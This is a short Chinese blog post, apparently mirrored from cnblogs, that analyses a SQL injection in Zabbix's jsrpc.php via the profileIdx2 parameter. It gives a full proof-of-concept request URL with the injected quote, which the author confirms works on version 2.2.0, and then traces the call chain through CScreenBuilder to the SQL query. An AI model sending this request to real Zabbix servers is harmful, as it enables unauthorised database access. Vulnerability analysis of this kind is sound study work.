zoukankan      html  css  js  c++  java
  • Zabbix 漏洞分析

    之前看到Zabbix 出现SQL注入漏洞,自己来尝试分析。

    PS:我没找到3.0.3版本的 Zabbix ,暂用的是zabbix 2.2.0版本,如果有问题,请大牛指点。

    0x00 Zabbix简介

    zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。

    0x01 Zabbix漏洞POC&尝试

    POC如下:

    /jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2'3297&updateProfile=true&screenitemid=.=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1
    我用的ZABBIX 2.2.0版本尝试下POC,存在漏洞。

    0x02 Zabbix漏洞分析

    看下jsrpc.php中的profileIdx2参数:

      跟着调用,然后继续看下CScreenBuilder中的getScreen:

     继续看API中的ScreenItem():

     调用静态getObject(),如下:

     调用静态getApi(),如下:

    接下来是NEW CZBXAPI():

    最后调用SQL查询:

     综上,profileIdx2参数存在SQL注入。

     
    低调求发展,潜心习安全。
  • 相关阅读:
    可运行的Java RMI示例和踩坑总结
    JS异步与同步
    Github作为Maven仓库
    Jmeter笔记
    nodeJS生成xlsx以及设置样式
    double运算的坑
    mysql零散操作
    go包的理解
    nodeJS 服务端文件上传
    webpack+thymeleaf实现数据直出
  • 原文地址:https://www.cnblogs.com/MiWhite/p/6119456.html
Copyright © 2011-2022 走看看